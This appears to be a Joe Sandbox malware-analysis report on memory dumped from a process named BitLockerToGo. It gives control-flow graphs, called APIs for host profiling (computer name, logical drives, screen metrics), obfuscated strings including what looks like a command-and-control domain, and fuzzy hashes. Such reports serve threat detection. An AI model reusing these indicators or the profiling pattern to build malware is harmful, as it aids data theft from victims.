                                                                              control_flow_graph 892 45da13-45da53 call 481380 call 459490 CoUninitialize 897 45da60-45da81 892->897 897->897 898 45da83-45da98 897->898 899 45daa0-45dacc 898->899 899->899 900 45dace-45db2b 899->900 901 45db30-45db4a 900->901 901->901 902 45db4c-45db56 901->902 903 45db58-45db66 902->903 904 45db7b-45db83 902->904 905 45db70-45db79 903->905 906 45db85-45db86 904->906 907 45db9b-45dba8 904->907 905->904 905->905 908 45db90-45db99 906->908 909 45dbcb-45dbd3 907->909 910 45dbaa-45dbb1 907->910 908->907 908->908 912 45dbd5-45dbd6 909->912 913 45dbeb-45dbf5 909->913 911 45dbc0-45dbc9 910->911 911->909 911->911 914 45dbe0-45dbe9 912->914 915 45dbf7-45dbfb 913->915 916 45dc0b-45dc17 913->916 914->913 914->914 917 45dc00-45dc09 915->917 918 45dc31-45dd4f 916->918 919 45dc19-45dc1b 916->919 917->916 917->917 921 45dd50-45dd7b 918->921 920 45dc20-45dc2d 919->920 920->920 922 45dc2f 920->922 921->921 923 45dd7d-45dd9f 921->923 922->918 924 45dda0-45ddcd 923->924 924->924 925 45ddcf-45ddfd call 45b640 924->925 927 45de02-45de1c 925->927
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: Uninitialize
                                                                              • String ID: +234$4/2%$WTF,$YPED$]^$cycahao.shop$hlb:$Z\
                                                                              • API String ID: 3861434553-2591049864
                                                                              • Opcode ID: 2bf70a7a9b50058f25a24e7ab1169372ccc6be70f80b37519c46b85f3fc5b444
                                                                              • Instruction ID: d206830ab9a6a14273a75bd0de34779af5684cb2176accc75286da81e8537321
                                                                              • Opcode Fuzzy Hash: 2bf70a7a9b50058f25a24e7ab1169372ccc6be70f80b37519c46b85f3fc5b444
                                                                              • Instruction Fuzzy Hash: 6391ACB050D3D18AD3368F2984903EBBFE2AFE6305F18499ED4C99B252C775450ACB5B

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 928 471620-471668 call 48d230 931 47166e-4716e9 call 464710 call 489780 928->931 932 471de9-471df9 928->932 937 4716eb-4716ee 931->937 938 471713-471717 937->938 939 4716f0-471711 937->939 940 471719-471724 938->940 939->937 941 471726 940->941 942 47172b-471744 940->942 943 4717ef-4717f2 941->943 944 471746-47174a 942->944 945 47174f-471755 942->945 946 4717f6-4717fb 943->946 947 4717f4 943->947 948 4717e0-4717e3 944->948 949 471757-471760 945->949 950 471762-4717d2 call 48afd0 945->950 953 471801-471811 946->953 954 471d1c-471d58 call 4897a0 946->954 947->946 951 4717e7-4717ea 948->951 952 4717e5 948->952 949->948 956 4717d7-4717dc 950->956 951->940 952->943 957 471813-471833 953->957 965 471d5a-471d5d 954->965 956->948 959 471a1b-471a1e 957->959 960 471839-471864 957->960 962 471a26-471a37 call 489780 959->962 963 471a20-471a24 959->963 968 471866-471869 960->968 981 471a49-471a4b 962->981 982 471a39-471a44 962->982 966 471a4d-471a4f 963->966 969 471d82-471d86 965->969 970 471d5f-471d80 965->970 972 471a55-471a76 966->972 973 471ced-471cf8 966->973 974 4718b5-4718d7 call 471e00 968->974 975 47186b-4718b3 968->975 976 471d88-471d8e 969->976 970->965 983 471a7a-471a7d 972->983 979 471cfc-471d04 973->979 980 471cfa-471d0a 973->980 974->959 993 4718dd-471906 974->993 975->968 977 471d92-471da6 976->977 978 471d90 976->978 985 471daa-471db0 977->985 986 471da8 977->986 978->932 988 471d0c 979->988 980->988 981->966 989 471d0e-471d12 982->989 990 471a7f-471aaa 983->990 991 471aac-471aeb 983->991 994 471dd9-471ddc 985->994 995 471db2-471dd7 call 48afd0 985->995 986->994 988->989 989->957 996 471d18-471d1a 989->996 990->983 997 471aed-471af0 991->997 1000 471908-47190b 993->1000 1002 471de2-471de7 994->1002 1003 471dde-471de0 994->1003 995->994 996->954 998 471b15-471b19 997->998 999 471af2-471b13 997->999 1005 471b1b-471b26 998->1005 999->997 1006 471957-471979 call 471e00 1000->1006 1007 47190d-471955 1000->1007 1002->976 1003->932 1009 471b2d-471b48 1005->1009 1010 471b28 1005->1010 1023 471980-47199d 1006->1023 1024 47197b 1006->1024 1007->1000 1013 471b51-471b59 1009->1013 1014 471b4a-471b4c 1009->1014 1012 471c01-471c04 1010->1012 1020 471c06 1012->1020 1021 471c0d-471c2c 1012->1021 1018 471b65-471bdf call 48afd0 1013->1018 1019 471b5b-471b60 1013->1019 1016 471bf0-471bf5 1014->1016 1026 471bf7 1016->1026 1027 471bf9-471bfc 1016->1027 1032 471be4-471beb 1018->1032 1019->1016 1020->1021 1022 471c2e-471c31 1021->1022 1028 471c33-471c88 1022->1028 1029 471c8a-471c90 1022->1029 1030 4719a1-471a19 call 458050 call 464380 call 458060 1023->1030 1031 47199f 1023->1031 1024->959 1026->1012 1027->1005 1028->1022 1033 471c92-471c96 1029->1033 1034 471cbe-471cc1 1029->1034 1030->959 1031->1030 1032->1016 1036 471c98-471c9f 1033->1036 1037 471cd6-471cdc 1034->1037 1038 471cc3-471cd4 call 4897a0 1034->1038 1040 471ca1-471cad 1036->1040 1041 471caf-471cb2 1036->1041 1044 471cde-471ce1 1037->1044 1038->1044 1040->1036 1046 471cb4 1041->1046 1047 471cba-471cbc 1041->1047 1044->973 1045 471ce3-471ceb 1044->1045 1045->989 1046->1047 1047->1034
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeapInitializeThunk
                                                                              • String ID: !@$#$$$&$)$,$7$@$A$B
                                                                              • API String ID: 383220839-937713689
                                                                              • Opcode ID: 1cdd0fc11fa7d295e9b8c1af0567672f55ad50737467b3e242a4873220730e1e
                                                                              • Instruction ID: 6cd0bc7f9e7fd4489cd91017820840675101a777c822517eca40cc19b87c2bfd
                                                                              • Opcode Fuzzy Hash: 1cdd0fc11fa7d295e9b8c1af0567672f55ad50737467b3e242a4873220730e1e
                                                                              • Instruction Fuzzy Hash: 3822B37160C3808FD3258B7CC4913AFBBE1ABC5314F198A2EE5DA873A1D6799845CB47

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1053 4732a0-4732f6 1054 473300-47334e 1053->1054 1054->1054 1055 473350-473391 1054->1055 1057 4733a0-4733bc 1055->1057 1057->1057 1058 4733be-4733c8 1057->1058 1059 473417-473423 1058->1059 1060 473406 1058->1060 1061 473424-47342d 1058->1061 1062 473544-473555 1058->1062 1063 473534-47353b 1058->1063 1064 4733cf-4733d5 1058->1064 1065 47340e-473414 call 458060 1058->1065 1066 47372a-4737d1 1058->1066 1067 4736fa 1058->1067 1068 4736e8-4736f2 1058->1068 1060->1065 1070 473436 1061->1070 1071 47342f-473434 1061->1071 1072 473557-473560 1062->1072 1073 473562-473566 1062->1073 1063->1062 1074 4733d7-4733dc 1064->1074 1075 4733de 1064->1075 1065->1059 1069 4737e0-4737f2 1066->1069 1068->1067 1069->1069 1078 4737f4-473804 call 471620 1069->1078 1079 47343d-473474 call 458050 1070->1079 1071->1079 1080 473568-47360f call 458050 1072->1080 1073->1080 1081 4733e1-4733ff call 458050 1074->1081 1075->1081 1086 473809-47380c 1078->1086 1090 473480-4734b8 1079->1090 1091 473610-47365f 1080->1091 1081->1059 1081->1060 1081->1061 1081->1062 1081->1063 1081->1065 1081->1066 1081->1067 1081->1068 1092 473814 1086->1092 1090->1090 1093 4734ba-4734c2 1090->1093 1091->1091 1094 473661-473671 1091->1094 1096 4734c4-4734c9 1093->1096 1097 4734e1-4734ed 1093->1097 1098 473673-47367a 1094->1098 1099 473691-47369d 1094->1099 1100 4734d0-4734df 1096->1100 1101 473511-47351c call 48d3c0 1097->1101 1102 4734ef-4734f3 1097->1102 1103 473680-47368f 1098->1103 1104 4736c1-4736e1 GetLogicalDrives call 48d3c0 1099->1104 1105 47369f-4736a3 1099->1105 1100->1097 1100->1100 1110 473521-47352d 1101->1110 1109 473500-47350f 1102->1109 1103->1099 1103->1103 1104->1067 1104->1068 1104->1092 1112 473712 1104->1112 1113 473700-473706 call 458060 1104->1113 1114 473710 1104->1114 1115 47381a-473837 1104->1115 1116 473709-47370f 1104->1116 1117 473718-473721 call 458060 1104->1117 1107 4736b0-4736bf 1105->1107 1107->1104 1107->1107 1109->1101 1109->1109 1110->1062 1110->1063 1110->1066 1110->1067 1110->1068 1110->1092 1110->1112 1110->1113 1110->1114 1110->1115 1110->1116 1110->1117 1113->1116 1119 473840-473868 1115->1119 1116->1114 1117->1066 1119->1119 1122 47386a-4738f2 1119->1122 1124 473900-473929 1122->1124 1124->1124 1125 47392b-47394e call 4714b0 1124->1125
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 7`$JY$R\$^E$jk$x
                                                                              • API String ID: 0-4150650586
                                                                              • Opcode ID: 0b3b7a2dea9d9a1fff0b63f0730be3ebc17df7a061a20586c4ef19ee2bba984f
                                                                              • Instruction ID: 0f9aee5eaccdeb1128313160a464f13413844146e5bdf2993e0bf8d3e0c0deeb
                                                                              • Opcode Fuzzy Hash: 0b3b7a2dea9d9a1fff0b63f0730be3ebc17df7a061a20586c4ef19ee2bba984f
                                                                              • Instruction Fuzzy Hash: 59F1FDB15083408FE310DF65D88266BBBE0FFD1308F14892DF58A9B351E7788906CB8A

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1128 47b81f-47b93e call 48cbc0 1131 47b943-47b994 GetComputerNameExA 1128->1131 1132 47b9a0-47b9cc 1131->1132 1132->1132 1133 47b9ce-47b9d8 1132->1133 1134 47b9fd 1133->1134 1135 47b9da-47b9e5 1133->1135 1136 47ba01-47ba10 1134->1136 1137 47b9f0-47b9f9 1135->1137 1138 47ba12-47ba1b 1136->1138 1139 47ba2d 1136->1139 1137->1137 1140 47b9fb 1137->1140 1141 47ba20-47ba29 1138->1141 1142 47ba2f-47ba82 GetComputerNameExA 1139->1142 1140->1136 1141->1141 1143 47ba2b 1141->1143 1144 47ba90-47badb 1142->1144 1143->1142 1144->1144 1145 47badd-47bae7 1144->1145 1146 47bafb-47bb08 1145->1146 1147 47bae9 1145->1147 1149 47bb2b-47bb86 1146->1149 1150 47bb0a-47bb11 1146->1150 1148 47baf0-47baf9 1147->1148 1148->1146 1148->1148 1153 47bb90-47bbdf 1149->1153 1151 47bb20-47bb29 1150->1151 1151->1149 1151->1151 1153->1153 1154 47bbe1-47bbeb 1153->1154 1155 47bc0d 1154->1155 1156 47bbed-47bbf8 1154->1156 1158 47bc11-47bc1e 1155->1158 1157 47bc00-47bc09 1156->1157 1157->1157 1159 47bc0b 1157->1159 1160 47bc20-47bc27 1158->1160 1161 47bc3b-47bc94 call 48cbc0 1158->1161 1159->1158 1162 47bc30-47bc39 1160->1162 1166 47bca0-47bcd6 1161->1166 1162->1161 1162->1162 1166->1166 1167 47bcd8-47bce2 1166->1167 1168 47bce4-47bceb 1167->1168 1169 47bcfb-47bd16 1167->1169 1170 47bcf0-47bcf9 1168->1170 1171 47be76-47beb2 1169->1171 1172 47bd1c-47bd23 1169->1172 1170->1169 1170->1170 1174 47bec0-47bee3 1171->1174 1173 47bd30-47bd3a 1172->1173 1175 47bd50-47bd56 1173->1175 1176 47bd3c-47bd41 1173->1176 1174->1174 1177 47bee5-47bef5 1174->1177 1179 47bd90-47bda0 1175->1179 1180 47bd58-47bd5b 1175->1180 1178 47be10-47be26 1176->1178 1181 47bef7-47beff 1177->1181 1182 47bf0b-47bf0e call 47f910 1177->1182 1188 47be2a-47be30 1178->1188 1185 47bda6-47bda9 1179->1185 1186 47be3c-47be44 1179->1186 1180->1179 1183 47bd5d-47bd82 1180->1183 1184 47bf00-47bf09 1181->1184 1192 47bf13-47bf2f 1182->1192 1183->1178 1184->1182 1184->1184 1185->1186 1191 47bdaf-47be03 1185->1191 1189 47be46-47be48 1186->1189 1190 47be4a-47be4d 1186->1190 1188->1171 1193 47be32-47be34 1188->1193 1189->1188 1194 47be72-47be74 1190->1194 1195 47be4f-47be70 1190->1195 1191->1178 1193->1173 1196 47be3a 1193->1196 1194->1178 1195->1178 1196->1171
                                                                              APIs
                                                                              • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 0047B967
                                                                              • GetComputerNameExA.KERNELBASE(00000005,?,00000200), ref: 0047BA53
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: ComputerName
                                                                              • String ID: 1ako$MCIZ$x^T1$x^T1
                                                                              • API String ID: 3545744682-2754304666
                                                                              • Opcode ID: f6d699ad153a1666f4889418185208ccf478daac2b827af47026549310f6a568
                                                                              • Instruction ID: e506da902619c15d0d51c37a3d0ec4bb1b5b0510d8d83be76a3d211fe78a897e
                                                                              • Opcode Fuzzy Hash: f6d699ad153a1666f4889418185208ccf478daac2b827af47026549310f6a568
                                                                              • Instruction Fuzzy Hash: 0EE1F4616183C18AD7258B3984517EBBBD1DFE2304F18C96ED4CD87382D778890AD7A6

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1219 4817b8-481899 call 464730 GetSystemMetrics * 2 1227 4818a0-481933 1219->1227
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem
                                                                              • String ID:
                                                                              • API String ID: 4116985748-3916222277
                                                                              • Opcode ID: 4f991b31ed84108a1a6487319c1017f372c1f1698659ce3167e9dff46e301b60
                                                                              • Instruction ID: ea642c7d3bd6098ba79d56dd32afeec97f815400338bc7ebfe3a729ab0d587c9
                                                                              • Opcode Fuzzy Hash: 4f991b31ed84108a1a6487319c1017f372c1f1698659ce3167e9dff46e301b60
                                                                              • Instruction Fuzzy Hash: 025183B0E152049FDB40EFACD981A9DBBF0BF48310F11866AE498E7350D734A944CF96

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1230 46ca00-46ca23 1231 46ca2a-46ca46 1230->1231 1232 46cacb-46caf7 1230->1232 1231->1232 1233 46cab4-46cac4 1231->1233 1234 46ca50-46ca82 1231->1234 1235 46ca89-46caad call 46d190 1231->1235 1236 46cb00-46cb2e 1232->1236 1233->1232 1233->1233 1233->1234 1233->1235 1234->1232 1234->1233 1234->1234 1234->1235 1235->1233 1235->1234 1236->1236 1237 46cb30-46cb41 call 464740 1236->1237 1241 46cb46-46cb8f 1237->1241 1242 46cb90-46cc02 1241->1242 1242->1242 1243 46cc04-46cc5b call 464740 1242->1243 1246 46cc60-46cca2 1243->1246 1246->1246 1247 46cca4-46cd2b call 464740 1246->1247 1250 46cd30-46cd56 1247->1250 1250->1250 1251 46cd58-46cd9f call 464740 1250->1251 1254 46cda0-46cdd2 1251->1254 1254->1254 1255 46cdd4-46ce02 call 464740 1254->1255 1258 46d175-46d17f call 458060 1255->1258 1259 46d182-46d18b 1255->1259 1260 46d16f 1255->1260 1261 46d15c-46d166 call 458060 1255->1261 1262 46ce09-46ce14 1255->1262 1258->1259 1260->1258 1261->1260 1263 46ce20-46ce29 1262->1263 1263->1263 1267 46ce2b-46ce2e 1263->1267 1269 46ce37 1267->1269 1270 46ce30-46ce35 1267->1270 1271 46ce3a-46cea6 call 458050 1269->1271 1270->1271 1274 46ceb0-46cef6 1271->1274 1274->1274 1275 46cef8-46cf00 1274->1275 1276 46cf02-46cf07 1275->1276 1277 46cf21-46cf32 1275->1277 1280 46cf10-46cf1f 1276->1280 1278 46cf34-46cf38 1277->1278 1279 46cf51-46cf61 1277->1279 1281 46cf40-46cf4f 1278->1281 1282 46cf70-46cf79 1279->1282 1280->1277 1280->1280 1281->1279 1281->1281 1282->1282 1283 46cf7b-46cf82 1282->1283 1284 46cf90-46cf99 1283->1284 1284->1284 1285 46cf9b-46cfa7 1284->1285 1286 46cfb0-46cfb2 1285->1286 1287 46cfa9-46cfae 1285->1287 1288 46cfb9-46cfce call 458050 1286->1288 1287->1288 1291 46cfd0-46cfd5 1288->1291 1292 46cff1-46d02a 1288->1292 1293 46cfe0-46cfef 1291->1293 1294 46d030-46d08c 1292->1294 1293->1292 1293->1293 1294->1294 1295 46d08e-46d097 1294->1295 1296 46d0c3-46d0c7 1295->1296 1297 46d099-46d0a4 1295->1297 1299 46d0cb-46d0d8 1296->1299 1298 46d0b0-46d0bf 1297->1298 1298->1298 1300 46d0c1 1298->1300 1301 46d0f1-46d103 1299->1301 1302 46d0da-46d0df 1299->1302 1300->1299 1304 46d110-46d135 1301->1304 1303 46d0e0-46d0ef 1302->1303 1303->1301 1303->1303 1304->1304 1305 46d137-46d154 call 4714b0 1304->1305 1305->1261
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: +$jk$vw
                                                                              • API String ID: 0-3558127645
                                                                              • Opcode ID: 315db3748b672e086d95004ea4f42768632c02c0723a820faace47aa673cd5ab
                                                                              • Instruction ID: 4fdf0a7f2bb95e58eab4c2e23896c84b5e983f8f40fef0a9b06fff7cb3c64489
                                                                              • Opcode Fuzzy Hash: 315db3748b672e086d95004ea4f42768632c02c0723a820faace47aa673cd5ab
                                                                              • Instruction Fuzzy Hash: 0812137290C3408BC704DF65C8916ABBBF2EFD6314F09886DE4D58B391E6798909CB97

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1335 48e3c0-48e3cf 1336 48e3d1 1335->1336 1337 48e3f3-48e3fc 1335->1337 1340 48e3e0-48e3e8 1336->1340 1338 48e3fe-48e401 1337->1338 1339 48e403-48e424 1337->1339 1338->1339 1342 48e430-48e44a 1339->1342 1340->1340 1341 48e3ea-48e3ed 1340->1341 1341->1337 1342->1342 1343 48e44c-48e45f 1342->1343 1344 48e460-48e492 1343->1344 1344->1344 1345 48e494-48e4a1 1344->1345 1346 48e4b0-48e4e2 1345->1346 1346->1346 1347 48e4e4-48e4ef 1346->1347 1348 48e53d-48e549 1347->1348 1349 48e4f1-48e4fb 1347->1349 1350 48e550-48e581 1348->1350 1351 48e500-48e507 1349->1351 1350->1350 1352 48e583-48e586 1350->1352 1353 48e509-48e50c 1351->1353 1354 48e510-48e516 1351->1354 1355 48e58c-48e5af call 489780 1352->1355 1356 48e720-48e729 1352->1356 1353->1351 1357 48e50e 1353->1357 1354->1348 1358 48e518-48e533 call 48afd0 1354->1358 1363 48e5b0-48e5ec 1355->1363 1357->1348 1361 48e538-48e53b 1358->1361 1361->1348 1363->1363 1364 48e5ee-48e5ff 1363->1364 1365 48e600-48e632 1364->1365 1365->1365 1366 48e634-48e63f 1365->1366 1367 48e641-48e649 1366->1367 1368 48e696-48e69c 1366->1368 1371 48e650-48e657 1367->1371 1369 48e69e-48e6a4 1368->1369 1370 48e717-48e71d call 4897a0 1368->1370 1372 48e6ab-48e6b0 1369->1372 1373 48e6a6-48e6a9 1369->1373 1370->1356 1374 48e659-48e65c 1371->1374 1375 48e660-48e666 1371->1375 1372->1370 1379 48e6b2-48e6b4 1372->1379 1373->1372 1374->1371 1380 48e65e 1374->1380 1375->1368 1378 48e668-48e68a call 48afd0 1375->1378 1384 48e68f-48e694 1378->1384 1382 48e70e-48e715 1379->1382 1383 48e6b6-48e6c1 1379->1383 1380->1368 1382->1370 1385 48e6c3 1383->1385 1386 48e6c5-48e701 1383->1386 1384->1368 1385->1386 1386->1382 1387 48e703-48e70b 1386->1387 1387->1382
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: DGHI
                                                                              • API String ID: 2994545307-2001188618
                                                                              • Opcode ID: a7f732834ffaf124636f4f382547db7445925427be9e48816f98258936f3d04e
                                                                              • Instruction ID: c377e218220d282f05b7a4a2c47500d0c59c8a4e80c33aadd967a31c4a449af5
                                                                              • Opcode Fuzzy Hash: a7f732834ffaf124636f4f382547db7445925427be9e48816f98258936f3d04e
                                                                              • Instruction Fuzzy Hash: F2A185726083108FC728EF25C88096FB7A2EBE6304F198D3DE98257355EB35AC05C796
                                                                              APIs
                                                                              • LdrInitializeThunk.NTDLL(00489B85,?,00000010,00000000,?,00000018,?,?,?,?,?,?,?,00000000), ref: 0048AFFE
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                              • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                              • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                              • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: @
                                                                              • API String ID: 2994545307-2766056989
                                                                              • Opcode ID: 55be1cce2c910f092cd308746bb46f2edfc01afcac34b89b5309391d1406a3e0
                                                                              • Instruction ID: 2069a60fc85404fa121b9b08a77deab8cc97003c1011a7304f3312712956f116
                                                                              • Opcode Fuzzy Hash: 55be1cce2c910f092cd308746bb46f2edfc01afcac34b89b5309391d1406a3e0
                                                                              • Instruction Fuzzy Hash: 4C4159B29063109BC714DF28C84166FB7A2FFC5318F158A2EE8955B3C1D738AD05C786
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID: GJM3
                                                                              • API String ID: 2994545307-2693654480
                                                                              • Opcode ID: c2bc226a3961892b97416747084f76d2ccace0fee570d21323f3ba7784cc76c3
                                                                              • Instruction ID: 1271e48e4c133060cf15210f072e571b98c33e26d73df6bf8f7cd38030fb50e1
                                                                              • Opcode Fuzzy Hash: c2bc226a3961892b97416747084f76d2ccace0fee570d21323f3ba7784cc76c3
                                                                              • Instruction Fuzzy Hash: 6231D8741083814BE7698B3858E17BBBBE19F97315F28897DD0CE8B392DB355845CB09
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
